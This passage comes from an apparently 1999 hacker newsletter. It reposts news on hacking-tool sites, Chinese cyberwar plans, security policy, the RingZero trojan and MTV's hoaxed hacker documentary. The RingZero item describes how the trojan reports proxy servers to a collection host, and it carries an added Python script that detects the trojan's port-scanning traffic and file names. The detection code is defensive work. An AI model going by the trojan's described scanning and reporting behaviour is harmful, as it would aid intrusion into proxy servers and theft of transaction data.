      the messages--just good old-fashioned smarts and a little persistence.

      Cryptography is the art and science of secret messages. Since people first 
      set stylus to tablet, ciphers and codes have been used to conceal the 
      meaning of written text. Cryptography played a vital role in 
      politics, business, and war throughout history, changing the fortunes of 
      Julius Caesar and Mary Queen of Scots, among others. Why, without 
      cryptography, the Allies might never have won World War II! These days, 
      cryptography is crucial in the everyday workings of our computers, from 
      e-mail encryption to secure financial transactions.

      Here at Amazon.com, we like to think of cryptography as a good, wholesome 
      activity, providing hours of fun for the whole family. But it's no fun if 
      no one gets the correct answer, so if you're having trouble, check 
      back--we may post some hints to help you get started. Without further ado, 
      may we present the crypto-challenge. Happy solving!

      038-097-34-64-242-335-51-377-183-168       
      038-097-34-64-380-330-115-289-273-189-56 
      068-486-42-23-87-434-10-468-151-345-150-494-376-415-426 
      038-549-53-15-1-193-121-29-109-66-28-160-106 
      047-111-70-99-24-21-25-12-53-22-56-8

      --Code created by Alex Yan and Katherine Degelau

      The Payoff
      Gee Whiz, Look at All This Keen Stuff! 

      - Signed editions of Cryptonomicon, The Code Book, Between Silk and 
        Cyanide, and Applied Cryptography
      - A LEGO Mindstorms(TM) Robotics Invention System kit
      - A chance to tell the world how you solved the crypto puzzle! 

      How to Enter

         1. Send your answer, via e-mail, to crypto-contest@amazon.com.
         2. Include the full finished translation of the puzzle, as well as your 
            full name and daytime telephone number.
         3. Your entry (one per person, please) must be received by 11:59 pm 
            (PST) Friday, October 29, 1999, or we won't be able to evaluate it.
         4. Entries with the correct solution will be entered into a random 
            drawing, from which we will pick the winner. 
         5. You must be a resident of the U.S. or Canada, excluding Quebec, to 
            participate. 
         
      @HWA    

20.0  Web Sites Cause Crime, Report Says 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      Computer Economics, an independent research firm, has
      released a report blaming underground websites for the
      proliferation of computer crime. The damage caused by
      underground websites, they say, is estimated at over 1
      Trillion dollars a year world wide. 

      Yahoo News
      http://biz.yahoo.com/bw/991018/ca_compute_1.html
      
      Computer Economics      
      http://www.computereconomics.com
      
      Yahoo;
      
      Monday October 18, 9:03 am Eastern Time
      Company Press Release

      Computer Crime-Abetting Sites Will Dramatically Increase Costs for 
      Businesses and Consumers

      CARLSBAD, Calif.--(BUSINESS WIRE)--Oct. 18, 1999--Hacking and 
      computer-crime-abetting Web sites are supplying Web surfers with tools and 
      instructions that could cost consumers and businesses worldwide over a       
      trillion dollars this year. 

      Computer Economics research shows that hacking and computer crime will 
      experience a dramatic increase in the next few years due to the abundance 
      of Web sites devoted to these topics. Also factoring into the growth of       
      computer crime is the low cost of the tools and instructions that these 
      sites sell, and the rise of the wireless Internet. 

      ``The Internet has always been a haven for computer criminals,'' said 
      Computer Economics research analyst Adam Harriss. ``The technologically 
      savvy hackers have been online swapping tips and programming for decades, 
      but now the information is being posted and sold at low cost in a
      form that even the techno-illiterate can understand. Causing damage to 
      machines and infiltrating systems has become as easy as putting together a 
      child's Christmas toy.'' 

      While some hacker sites warn that the products they sell are to be used 
      for informational purposes only, other sites pander to malicious users, 
      and are growing a future generation of hackers by targeting children. The 
      proprietors of some hacking manuals tout them as guides that help
      users ``search for company secrets.'' Vendors of hacking hardware often 
      boast that their goods ``screw up all types of computer disks.'' Software 
      that could be used to pirate other programs is sometimes said to be ``a 
      must for anyone who doesn't want to pay full price for software.'' 

      Not only are these hacking tools priced very low, but many of the most 
      popular hacking tools, such as L0phtCrack, AntiSniff, nmap, and netcat are 
      free shareware. Manuals and software about hacking and computer crime 
      interests such as viruses, counterfeiting, piracy, and various types
      of fraud typically run from $8 to $60. 

      The following table shows a few examples of the types of information and 
      technology that is available for order at low prices on the Internet. 

      Computer Crime Instructions and Software Available Online

           A manual that tells Microsoft users how to avoid the        $10
           $35 per incident fee for tech support after the 90 days
           of free support has run out.

           Software and instructions to circumvent any Internet        $30
           sites that are restricted by a ``parental block.''

           Software to remotely infiltrate the hard drives of          $50
           people in chat rooms and copy their software.

           A disk containing over 4000 live viruses including          $42
           CIA, Michaelangelo, JerusalemB, Dark Avenger, Darth
           Vader, Kool Aid, AIDS, Rape, Keydrop, Null, and Quiet.

           A guide to making a profit from software bootlegging.       $8

           Complete guide to hacking a Novell network. Software        $25
           and texts are included.

           Instructions about how to break into any Eudora             $30
           account.

      The low cost of computer crime software and hardware combined with the 
      dramatic expansion of the Internet into new, lesser-developed regions of 
      the world promises to exacerbate the hacking problem. There are roughly 
      three times as many people using wireless phone services as there
      are people on the Internet, so there is possibility for an online 
      explosion once a wireless Internet is established. With the expansion and 
      proliferation of the Internet in many countries with loose regulation of 
      computer crime and poorly organized law enforcement, hacking and computer 
      crime will flourish in the years to come. 

      Computer Economics is an independent research firm specializing in helping 
      IT decision makers plan, manage, and control IT costs through advisory 
      services, analyst support, an innovative Web site, and printed reports. 
      Based in Carlsbad, Calif., Computer Economics serves 82 percent of
      the Fortune 500. For further information, please visit the Web site at 
      http://www.computereconomics.com. 

      Contact: 

     Computer Economics Inc.
     Catherine Huneke, 760/438-8100, ext. 108 or 116
     chuneke@compecon.com
     http://www.computereconomics.com
     
     @HWA
     
21.0  China to Use Viruses During War 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      The People's Liberation Army of China is said to be
      preparing to fight a 'dirty war'. This includes terrorism,
      biochemical warfare, environmental damage and
      computer viruses in an effort to create political and
      economic crisis. 

      South China Morning Post
      http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-19991018025207920.asp
      
      Monday, October 18, 1999
      'PLA has plan to destroy West's finance systems in dirty war'

      SIMON MACKLIN in London

      Chinese military strategists have developed plans to destroy Western 
      financial institutions in the event of a major conflict, according to a 
      report in a British newspaper.

      Senior members of the People's Liberation Army are said to be urging the 
      Government to abandon conventional defence strategies and prepare for a 
      "dirty war".

      The Sunday Telegraph yesterday said PLA officials were advocating 
      terrorism, biochemical warfare, environmental damage and computer viruses 
      as a means of throwing the West into political and economic crisis.

      The maverick officers maintained that the mainland must use such tactics 
      because it cannot hope to match the West's military might.

      Outlines of the plans have been revealed in books and newspaper articles 
      published on the mainland.

      The blueprints for the dirty war say the PLA should infiltrate and 
      sabotage key pillars of Western society, including banks and the public 
      sector, in a response to a direct threat of war.

      The officers argue that Beijing's attempts to upgrade its nuclear and 
      conventional arsenal to match America's are insufficient to prepare China 
      for conflict.

      The increasing global world economy is pinpointed as a weak point which 
      should be exploited, and the PLA officers write admiringly of US financier 
      George Soros, whose attacks on foreign currencies are seen as a template 
      for disrupting an enemy's economic system.

      One recent article proposed that Beijing should set aside US$100 billion 
      (HK$775 billion) for such measures.

      A recently published book, Unrestricted War, says China must use every 
      weapon available to make itself equal to more developed countries.

      Another book by two PLA air force colonels lists 24 types of "dirty war" 
      that could be waged against the US and its allies.

      Colonel Qiao Liang, the author of a similar book, justified his eccentric 
      advice in a full-page newspaper article published in China.

      "All strong countries make rules while all rising ones break them and 
      exploit loopholes. Foreigners always rise by breaking the rules of 
      civilised and developed countries, which is what history is all about," he 
      wrote. 

      @HWA
      
22.0  Call for Public Security Database 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      At the recent National Information Systems Security
      Conference speakers called for a publicly accessible
      database of uncovered modes of attack. The
      conference sponsored by the Commerce Department's
      National Institute of Standards and Technology (NIST)
      and the National Security Agency was attended by
      military and intelligence people and industry executives
      from all over the world in an effort to bond together
      against what they call "united attackers". (A public
      database is sure better than what numerous other
      agencies are proposing.) 

      San Jose Mercury News        
      http://www.mercurycenter.com/business/top/067614.htm



      Posted at 10:09 p.m. PDT Monday, October 18, 1999 

      Tech firms urged to unite
      against computer vandals

      BY DAVID L. WILSON
      Mercury News Washington Bureau 

      ARLINGTON, VA. -- The people who make it their business to
      protect secure computer systems from illicit penetration by outsiders
      agreed Monday they have something important to learn from the
      villains: pooling information.

      By sharing information with each other, computer vandals gain an
      enormous advantage over those who try to thwart them, according to
      experts at a high-level conference on computer security here Monday.
      They cited an urgent need to overcome a penchant for secrecy and do
      a better job sharing resources.

      ``By sharing we gain a tremendous amount, and by not sharing we're
      not keeping any secrets,'' argued Matt Bishop, an associate professor
      of computer science at the University of California-Davis and a
      prominent authority on computer security.

      The National Information Systems Security Conference -- sponsored
      by the Commerce Department's National Institute of Standards and
      Technology (NIST) and the National Security Agency -- brought
      industry executives together with military and intelligence researchers
      from around the world to strategize on the battle against ``the intruder
      community.''

      Wily ``crackers'' -- the black hats of the game -- break into
      computer systems to steal valuable information, eavesdrop and
      otherwise humiliate their prey, or simply engage in vandalism by
      erasing all the data on a supposedly secure hard drive. Others in this
      cyberspace demimonde -- call them white hats or ``hackers'' -- also
      test the security of computer systems, but with a benign intent: Their
      sport is to discover vulnerability and help plug holes.

      Members of both groups routinely exchange information via the
      Internet, with the black hats using the information to write ``tool kits,''
      or software that will automatically attack vulnerable computers. The
      white hats, meanwhile, use this information to alert computer system
      administrators of flaws in their security that must be repaired, and try
      to pressure commercial software developers to issue software
      ``patches'' to fix the holes.

      In this environment, systems administrators can be quickly
      overwhelmed, said Peter Mell, a scientist with NIST's computer
      security division. The information used by the attackers is fragmented
      and diffuse and cannot be verified easily. Members of the intruder
      community typically don't hold down conventional jobs and can
      devote long hours to planning a security breach.

      Large organizations can try to fend off such guerrilla tactics, Mell told
      the audience, ``but it is so expensive to get this information, understand
      it and use it.''

      ``An attacker only has to find one way into your system,'' said
      Andrew Balinski, a security research engineer for networking giant
      Cisco Systems. ``A defender has to defend against all attacks.''

      Mell, Balinski and Bishop urged those at the conference to work
      toward pooling information they've uncovered on intruders' various
      modus operandi to create a publicly accessible database. Such an
      effort would make computer security much more practical and
      effective for everyone, they said.

      Cooperating on a common defense may have its drawbacks,
      however, the speakers acknowledged. An open public database might
      offer one-stop shopping for information vandals. And some security
      professionals would fear compromising their competitive advantage by
      sharing information. 

      Yet the defenders desperately need a system that can make it more
      cost effective to stay current on security threats, the experts argued. A
      good first step would be to develop a common framework to let
      researchers quickly classify attacks using standard descriptions. But
      even that won't be easy to accomplish.

      ``The attackers share a common goal,'' said Bishop, the UC Davis
      professor. ``We don't.'' 
      
      @HWA
      
      
23.0  GAO Calls for Security Laws 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      With NIPC, CIAO, NIST, and even the Office of
      Management and Budget all legally tasked to define
      security standards for various government agencies the
      Government Accounting Office feels it is time for
      Congress to step in and pass some laws. The GAO is
      recommending that laws be passed to help direct these
      various security efforts to eliminate duplication and
      overlapping. 

      Federal Computer Week      
      http://www.fcw.com/pubs/fcw/1999/1018/fcw-pollaw-10-18-99.html
      
      OCTOBER 18, 1999 


      GAO: IT security law needed

      Law would help direct disparate security policies

      BY DIANE FRANK (diane_frank@fcw.com)

      Agencies have improved the security of many information systems, but the
      lack of clearly defined roles among agencies coordinating security has
      hindered federal security experts' ability to protect systems from intrusion,
      according to the General Accounting Office.

      Agencies have spent the past two years plugging security holes in computer
      systems, but it has been such an ad hoc effort that federal security managers
      have been left without any coordinated guidance on developing a fully secure
      government, GAO officials told the Senate Judiciary Technology, Terrorism
      and Government Information Subcommittee this month.

      To help pull together agencies' efforts, GAO recommended that Congress
      should consider passing legislation that would better define how lead
      organizations should work together and how agencies should follow their
      direction.

      "It's not so much that there needs to be one central organization in charge as
      the need for defining where each organization fits," said Jean Boltz, assistant
      director of governmentwide and defense information systems within GAO's
      Accounting and Information Management Division (AIMD). "I think this is an
      area where legislation should definitely be considered."

      Until recently, the authority to oversee computer security resided in two
      organizations. The Paperwork Reduction Act of 1995 gave security oversight
      authority to the Office of Management and Budget, while the Computer
      Security Act of 1987 gave authority to the National Institute of Standards and
      Technology.

      But last year, President Clinton issued Presidential Decision Directive 63,
      requiring agencies to protect their critical information systems from
      cyberattacks. While PDD 63 helped focus federal attention on growing
      information security threats, it also created several new groups, including the
      National Infrastructure Protection Center at the FBI and the Critical
      Infrastructure Assurance Office (CIAO) at the National Security Council.

      The organizations' overlapping -- and in some cases conflicting --
      responsibilities have led to duplicate efforts, such as developing
      governmentwide instead of agency-specific best-practices guidelines, which
      has confused agencies, according to GAO executives.

      "While these organizations have developed fundamentally sound policies and
      guidance and have undertaken potentially useful initiatives, effective
      improvements are not taking place," Jack Brock, director of the AIMD
      office, testified before the subcommittee this month. 

      Some of the problems stem from the fact that the NIPC and the CIAO,
      formed in 1998, and the CIO Council, formed in 1997, are relatively new,
      and any new process or organization will need to iron out kinks, Brock said. 

      Still, some basic security issues must be solved soon, he said.

      "It is unclear how the activities of these many organizations interrelate, who
      should be held accountable for their success or failure and whether they will
      effectively and efficiently support national goals," Brock said.

      For agencies that are developing their own security plans under PDD 63 while
      complying with OMB regulations, it can be especially confusing getting
      guidance from so many places, Boltz said. 

      And the fact that some organizations' power is prescribed by law while others
      are given by PDD 63 or other executive orders leaves agencies wondering
      which orders are going.

      Some legislative changes are under way in Congress. The House Science
      Technology Subcommittee is working on the Computer Security Enhancement
      Act, a bill that would update NIST's role in the governmentwide security
      landscape. Others, including the Senate Government Affairs Committee, also
      have expressed interest in the issue of legislation.

      "There's a lot of interest and a lot of people looking at it right now," Boltz said.
      "It's really coming to fruition." 
      
      @HWA
      
      
24.0  RingZero Still on the Loose 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by toka25 
      HNN first mentioned this virus last week but now more
      information is available. RingZero was designed to
      search the internet for proxy servers. RingZero has been
      labeled a "quantum leap in distributed attack
      technology" by researchers. 

      CMP TechWeb
      http://www.techweb.com/wire/story/TWB19991013S0018
      
      Experts Fear Trojan Proxy Server
      Virus
      (10/13/99, 7:05 p.m. ET)
      By Lee Kimber, TechWeb 

      Security experts are trying to track down the
      perpetrators of a huge Internet surveillance
      operation that they say could presage an
      attack on websites around the world. 

      Members of the Bethesda, Md.-based System
      Administration, Networking, and Security (SANS)
      Institute have already identified over 200 copies of a
      Trojan virus called RingZero that scans Web proxy
      servers and relays its findings back to remote
      computers across the Internet. 

      That means information, including credit card numbers,
      and other private transaction information could be
      stolen. 

      Since SANS warned its 64,000 members to check for
      the Trojan after the first was discovered two weeks
      ago, its researchers have slowly pieced together
      frightening evidence of a systematic attempt to gather
      information from commercial proxy servers. Proxy
      servers are widely used by business to handle Web
      access on office networks. They host intranet websites,
      let administrators restrict the websites staff may visit and
      cut bandwidth costs. 

      Once installed on a network, RingZero's pst.exe file
      randomly scans for proxy servers and makes them send
      their own Internet address and port number to what
      appears to be a data collection script running on a
      machine at www.rusftpsearch.net. 

      Crackers use IP addresses and port numbers as a
      starting point for breaking into computers. 

      "It's a quantum leap in distributed attack technology,"
      said SANS security researcher John Green. "The proxy
      is being used to send its own IP address and proxy port
      home to the mothership." 

      But SANS researchers think RingZero has other
      abilities too. They found the Trojan has a second part,
      called its.exe, that tries to retrieve files directly from
      Web-servers. Both parts seem able to work
      independently of each other. The researchers are
      currently trying to determine what the file-retrieving
      component does with its booty. 

      SANS is asking network administrators to check their
      systems for files called pst.exe and its.exe. It also wants
      to hear from any administrator who sees outgoing
      network traffic on port 8080 and 3128. Seeing such
      traffic on a network that doesn't have a proxy server is
      a strong sign that they have been infected by the
      RingZero. 
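
      The checks SANS asks for above can be run over connection logs and file
      listings. The following Python is an added example, not part of the
      TechWeb article or any SANS tool; the log format, internal address
      ranges, approved-proxy list and three-destination threshold are
      assumptions, and the sample log lines and file paths are constructed.

```python
import ipaddress
import ntpath
from collections import defaultdict

PROXY_PORTS = {8080, 3128}                  # ports named in the SANS request
TROJAN_FILENAMES = {"pst.exe", "its.exe"}   # file names named in the article
# Assumed internal ranges for the example site.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Constructed sample, one outbound TCP connection attempt per line:
# "<time> <src_ip> <dst_ip> <dst_port>" (assumed format).
SAMPLE_LOG = """\
1999-10-20T09:00:01 10.0.0.23 198.51.100.7 8080
1999-10-20T09:00:02 10.0.0.23 203.0.113.41 3128
1999-10-20T09:00:02 10.0.0.23 192.0.2.88 8080
1999-10-20T09:00:03 10.0.0.23 198.51.100.200 3128
1999-10-20T09:00:05 10.0.0.40 192.0.2.10 80
1999-10-20T09:00:06 10.0.0.40 203.0.113.5 8080
1999-10-20T09:00:07 10.0.0.51 10.0.0.2 3128
garbage line
1999-10-20T09:00:09 10.0.0.77 192.0.2.50 3128
1999-10-20T09:00:10 10.0.0.77 192.0.2.50 8080
"""

# Constructed paths, not locations reported for the Trojan.
SAMPLE_PATHS = [r"C:\WINDOWS\SYSTEM\PST.EXE",
                r"C:\TOOLS\pstat.exe",
                r"D:\TEMP\its.exe"]


def is_internal(addr):
    """True if addr falls inside one of the site's internal ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line):
    """Return (src, dst, port), or None for blank, comment or malformed lines."""
    parts = line.split()
    if len(parts) != 4 or parts[0].startswith("#"):
        return None
    _, src, dst, port = parts
    try:
        ipaddress.ip_address(src)
        ipaddress.ip_address(dst)
        return src, dst, int(port)
    except ValueError:
        return None


def find_proxy_scanners(log_text, approved_proxies=frozenset(), min_targets=3):
    """Map each suspect internal host to the external hosts it contacted
    on the proxy ports.

    Traffic from or to an approved proxy, and traffic that stays inside
    the site, is ignored. A host is reported only once it has reached
    min_targets distinct external destinations: one or two hits are more
    likely a user visiting a site that listens on 8080 than a scan.
    """
    targets = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, dst, port = rec
        if port not in PROXY_PORTS:
            continue
        if not is_internal(src) or is_internal(dst):
            continue
        if src in approved_proxies or dst in approved_proxies:
            continue
        targets[src].add(dst)
    return {src: sorted(dsts)
            for src, dsts in targets.items() if len(dsts) >= min_targets}


def find_named_files(paths):
    """Return the paths whose file name is pst.exe or its.exe (any case).

    A name match is only a lead for further inspection: unrelated
    software can use the same file names.
    """
    return [p for p in paths
            if ntpath.basename(p).lower() in TROJAN_FILENAMES]


if __name__ == "__main__":
    for host, dsts in find_proxy_scanners(SAMPLE_LOG).items():
        print(f"{host}: {len(dsts)} external proxy-port targets: {dsts}")
    for path in find_named_files(SAMPLE_PATHS):
        print(f"file name match: {path}")
```

      On a network with no proxy server, pass an empty approved_proxies set
      and lower min_targets to 1 so that any outbound hit on either port is
      listed for review.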
      
      @HWA


25.0  MTV Called Inexcusable By ITC 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      The Independent Television Commission (ITC) has
      labelled the recent MTV show on Hackers as
      inexcusable. The show attempted to portray what
      hackers and hacking is all about. Instead MTV was
      taken for a ride by one of the people they profiled and
      MTV failed to verify any of the 'facts' presented to
      them. The end result being that the underground
      community was portrayed as a bunch of criminals with
      no redeemable qualities. 

      ZD Net 
      http://www.zdnet.co.uk/news/1999/41/ns-10798.html

      Emmanuel Goldstein and the staff of 2600 spent a large
      amount of energy with the MTV crew when it was
      thought that MTV wanted to do a story on Kevin
      Mitnick. As it turns out MTV evidently did not have
      enough time and cut out all references to Mitnick. 

      Emmanuel Goldstein's Comments 
      http://www.hackernews.com/orig/emmanuel.html

      Shamrock's Statement
      http://www.hackernews.com/orig/shamrock.html
      (See elsewhere this issue)
      
      HNN Reader Comments
      http://www.hackernews.com/orig/mtv.html
      
      MTV's True Life: I'm a Hacker 
      http://www.mtv.com/mtv/tubescan/truelife/
      
      ZDNet;
      
      MTV made to look ridiculous by fake hacker
     
      Tue, 19 Oct 1999 17:31:17 GMT Will Knight 

      TV channel's blinkered view of hackers enabled programme hoax 

      America's premier music television channel, MTV has been duped by a hoaxer 
      in its much-maligned "True Life: I'm a Hacker" programme. After the show 
      was screened in the US, the main character in the show, Shamrock, issued a       
      statement revealing that he made the whole thing up. 

      Shamrock, who last week gave an in-depth interview with MTV explaining the 
      motivation behind his hacking exploits, on Monday said the show was total 
      nonsense and was designed to illustrate how gullible MTV was. 

      In the statement, published on the Hacking News Network Shamrock explained 
      it was MTV's cynical approach to hacking that prompted his scam. "We 
      waited for months to see if they would be realistic and after it was 
      obvious that they wouldn't, we figured the only option would be to
      discredit them with as much fiction as possible." 

      Shamrock adds that he and fellow hoaxers never expected MTV to swallow the 
      absurdities they made up and argued the hoax illustrated the shallow 
      nature of the mainstream media. "We had no intention of making hackers 
      look bad. All I can do is reiterate to you just how fake and hollow
      what you see on television is. After this experience I wonder where if any 
      truth lies in what we are told to watch. This is the obvious issue the 
      hacker community needs to address." 

      Practising British hacker Harlequin, famed for defacing international 
      Websites, told ZDNet News the media is often guilty of misunderstanding 
      and misrepresenting hackers. He said: "Hacking and computer technology are 
      very complex areas, both technically and socially. Naivety can
      easily be exploited as well as accuracy." 

      A representative from the Independent Television Commission (ITC), the 
      British television industry's independent watchdog, said that it considers 
      this kind of blunder inexcusable. "This sort of thing is not difficult to 
      detect if you've done your work properly. We would expect program
      makers to do their work and to make things that are factually accurate." 

      Despite several attempts, ZDNet was unable to reach an MTV spokesperson. 
      
      Goldstein's comments;
      
      Submitted By: Emmanuel Goldstein 

      I haven't had time to even begin to deal with this until now. So I'll be 
      as clear as possible. Our fears of what this show would be simply did not 
      do it justice. The reality was so much worse than any of the warnings we 
      started getting months ago. And the most troubling part of all this is 
      that so many people involved in this really knew better yet sensationalism 
      was allowed to run unchecked. 

      A little history to begin with. We at 2600 were approached by MTV back in 
      1998 when they expressed an interest in doing a hacker documentary, with 
      the Mitnick case being a focal point. For months after, we helped hook 
      them up with various people and spent a considerable amount of time 
      working with them and helping them however we could. 

      The first warnings of trouble came from an MTV intern who called into "Off 
      The Hook" on June 29 with the revelation that all references to Mitnick 
      had been eliminated and that the "documentary" was now going to focus 
      exclusively on three trendy teens instead of the people and issues that 
      were originally said to be the focus. 

      Even with this disturbing news, we told people to not pass judgement until 
      the thing had aired. Well, it's aired and now it's judgement day. 

      Right away, the show begins with such sensationalism and quotes meant to 
      scare the shit out of Joe America that I swear I could *smell* Geraldo. 
      "It's like being God." "If I had the opportunity to shut off all the power 
      in the city, would I do it?" "We want to know the location of every squad 
      car within the nearest vicinity [sic]." And finally, "What people don't 
      understand, they fear." Well, that's sure the theme of this half hour, 
      isn't it? MTV clearly didn't grasp what hackers are or maybe they just 
      didn't *want* to since anything that complex might confuse the audience 
      they know so well. And they certainly did their bit to spread fear 
      throughout the program with quotes like the above, with absolutely nothing 
      to show that this was anything other than teenage bravado. 

      Then the part that really pissed me off personally. Earlier this year, I 
      had asked the producers for one little thing in exchange for all the help 
      that I and other 2600 people had given them. President Clinton had given a 
      speech in January on computer hackers. We couldn't get the White House to 
      give us a video copy which we would have loved to use in our upcoming 
      documentary. I asked them if they could pull some strings and they said 
      they'd look into it. Last I heard they were having no success. And guess 
      what footage managed to show up in this program? That's right, the footage 
      they didn't even KNOW about which they obtained after all and kept for 
      themselves without a word to any of us! Fortunately there are other 
      networks who *do* live up to their promises and we've gotten the footage 
      from them. But this shows the sleaze factor at work in this kind of a 
      production. 

      "Never before have people so young had so much potential power to disrupt 
      the systems we all rely on." Please. Here we have the MTV age fixation 
      coupled with a blatant bit of hysteria with no factual basis to back it 
      up. Better get used to it as virtually none of the "facts" presented in 
      the next half hour will be researched or confirmed in any way. 

      "Chameleon faced off with one of America's most dangerous enemies." This 
      is basically Chameleon getting a piece of mail from someone he doesn't 
      know who lives overseas - at least that's all the details we're going to 
      get here. 

      "Shamrock - role model or renegade?" Yeah, that's the question that's been 
      plaguing the hacker world for years. 

      "Mantis - who says he can find out anything he wants about you." Just by 
      making such a claim, MTV will skip over all the proof and do a feature on 
      you as if everything you claim is true. Not one iota of evidence is ever 
      presented to back up this absurd bragging. 

      Now I want to point out that I don't personally have anything
      against any of the people who were portrayed in this program. They were 
      basically taken in by MTV and taken advantage of. But by the same token, I 
      don't think these people have a whole lot to do with the hacker community 
      - at least, not from what we could see here. 

      Almost every sentence uttered throughout this program was a mistruth
      of one sort or another. Mantis: "People see hackers as some fat kid 
      sitting at home dressed in black... I don't fit the stereotype of a 
      hacker." Well, guess what? You *do* fit the stereotype - MTV's stereotype 
      or else why would they have ignored all of the other people who are part 
      of the hacker world who don't fit into the MTV demographic? It's hard to 
      figure out who was playing who more - these kids or the MTV marketers. 
      Narrator: "At 16, Chameleon left high school and became a superstar of the 
      hacking underground." Yeah, we have superstars in the hacker world just 
      like in the music business - how convenient for MTV. In fact, we don't 
      really care at all about the technology - it's all about personalities. 
      (That was sarcasm in case any MTV people are getting hard reading that.) 

      They seem really happy turning the whole thing into an episode of
      COPS while Shamrock and friends walk in slow motion down city streets with 
      blurred faces. They can't get enough of his involvement with drug dealing, 
      as if that has got anything to do with anything. They call him an expert 
      on "phone phreaking" and once again don't back it up in any way. 
      Apparently just walking down a street saying "I have knowledge that many 
      people don't" is enough for MTV to believe you. "Not much is legal about 
      hacking but it's never been easier to do." I'd love to see MTV's 
      definition of hacking. From this show it would appear to be: affiliating 
      with terrorists, taking over the military, moving satellites, and dealing 
      drugs. 

      Serena is once again amazed that Mantis has a copy of "The Matrix" 
      on his computer. Apparently, she's never had the opportunity to download a 
      file. That's really all there is to it, you know. It's pretty fucking 
      simple and, once again, has got absolutely nothing to do with hacking. But 
      you have to love the mixed up hacker logic that is used to defend copying 
      a movie: "It's all about trading information. Information has to be free. 
      If Big Brother is watching me, why can't he be watched also?" Hello?? The 
      MATRIX?! Copying a pirated movie is somehow striking out at Big Brother? 
      What an insult to the many truly deserving causes that are out there and 
      were passed over for this tripe. 

      The only part of the program with any glimmer of what hacking is 
      about is the section on the L0pht. But they never even bother to get into 
      it, spending less than a minute on the entire group/concept and using the 
      majority of *that* time to portray them as people whose most important 
      ability would be disrupting the entire Internet. 

      Next, Serena follows Shamrock as he attempts to get to an imprisoned 
      friend's disk before the authorities do. (Didn't we see this plot device 
      in "Hackers"?) Of course we never see the disk, don't get any details 
      about the friend, and learn absolutely nothing about anything in the whole 
      fiasco. But we do get to hear this bizarre exchange:

      - Serena: "What do you think you can find on this disk?"
      - Shamrock: "The police! You know, when we're listening to them on the
        radio, obviously they're transmitting on a radio frequency - we know
        what frequency they're transmitting on cuz we're receiving it."

      Maybe a good dose of LSD is the only thing that'll make sense out of 
      that. 

      "You never know what you're dealing with when it comes to hacking" 
      is one of the insightful concluding thoughts. You also never know what 
      you're dealing with when you don't do any research into the subject matter 
      or check out your sources. I'm hearing now that Shamrock is claiming he 
      made the whole thing up just to fuck with them. If that's true, MTV 
      certainly got what they deserved by ignoring the advice and warnings of 
      knowledgeable people in order to pursue an utterly fictitious story. But 
      while Shamrock may have thought it was amusing, it was stupid and caused 
      great harm to the community by making people believe this kind of crap. I 
      can only assume that he thought they would actually check the facts before 
      running with the story. Now we all know better. 

      As for Chameleon, all kinds of allegations are thrown around about his 
      dealing with a terrorist. Yet the only "evidence" of this comes from the 
      editor of AntiOnline, who does not exactly have a good reputation when it 
      comes to presenting facts accurately. (MTV hired him as their technology 
      consultant - another detail they kept quiet.) There is absolutely NO 
      EVIDENCE from a credible source that this foreign person he got a check 
      from had anything to do with any terrorist group. All it shows is that 
      someone was monumentally stupid in thinking that paying to hack a web page 
      was a good idea. Again, nothing to do with hacking. Again, the facts were 
      never checked. 

      Mantis: "I've been to the end of the Internet and back - over the course 
      of my years, I've done everything possible." This kid is 19. With a boast 
      like that, I expect him to have found the meaning of life by the time he's 
      30. I say we hold him to it. 

      What's amazing (and indicative of the MTV sleaze once more) is that Mantis 
      isn't shown to be doing anything illegal. In fact, he's the success story, 
      teaching others, staying out of trouble, doing positive things... Yet MTV 
      manages to make him look like a criminal by getting him to say that *IF* 
      he did something illegal he would know how to cover himself. Slick. 

      The whole charade ends with footage of Serena not able to get into her AOL 
      account and saying "my account has been hacked by hackers." She feels 
      "angry and violated." There is irony here - most everyone in the hacker 
      world has the same feeling right now because of MTV's yellow journalism. 
      But once again, there is no evidence to suggest that this "hack" is 
      anything more than a publicity stunt, much like when MTV hacked its own 
      web page a while back to get attention. If there is anything to suggest 
      that Serena herself didn't do this or one of her fellow employees didn't 
      set it up to get the "perfect ending," I sure didn't see it. Changing a 
      password on AOL is not exactly hacking. But since nothing else in this 
      half hour was either, we can hardly be surprised. 

      So the lessons to be learned here are several. The most important being: 
      DON'T TRUST THE MEDIA! Especially the slick and trendy media. They're not 
      interested in the story but rather in being cool and accepted in the 
      industry. If you don't know how to deal with them, they will screw you 
      over and as a result screw over those people you're supposedly speaking on 
      behalf of. Far too many people were getting all excited about MTV doing a 
      piece on Mitnick that they played right into their hands and got 
      crucified. While Kevin was justifiably upset that they cut him out of the 
      program (they claim they just didn't have enough time), I think he'll be 
      happy not to have any affiliation at all with this portrayal. 
      Interestingly, special thanks are given to David Schindler (Kevin's 
      prosecutor) which means that they actually managed to do a rare video 
      interview with him and still decided to shelve it or maybe he gave them a 
      ton of money to just sit on the story. At this point, I'll believe 
      anything. 

      emmanuel 
      
      
      @HWA


26.0  Bush Web Site Defaced 
      ~~~~~~~~~~~~~~~~~~~~~
       
      From HNN http://www.hackernews.com/

      contributed by punkis 
      The web site of presidential candidate George W Bush
      was defaced yesterday and filled with Marxist
      propaganda. Evidently in the rush to switch over from
      Unix to NT the administrators forgot to remove the
      sample .asp files. 

      Associated Press - via Yahoo
      http://dailynews.yahoo.com/h/ap/19991019/tc/bush_hacked_3.html
       
      Wired
      http://www.wired.com/news/politics/0,1283,31986,00.html
       
      Attrition.org - Screen Shot of Defacement
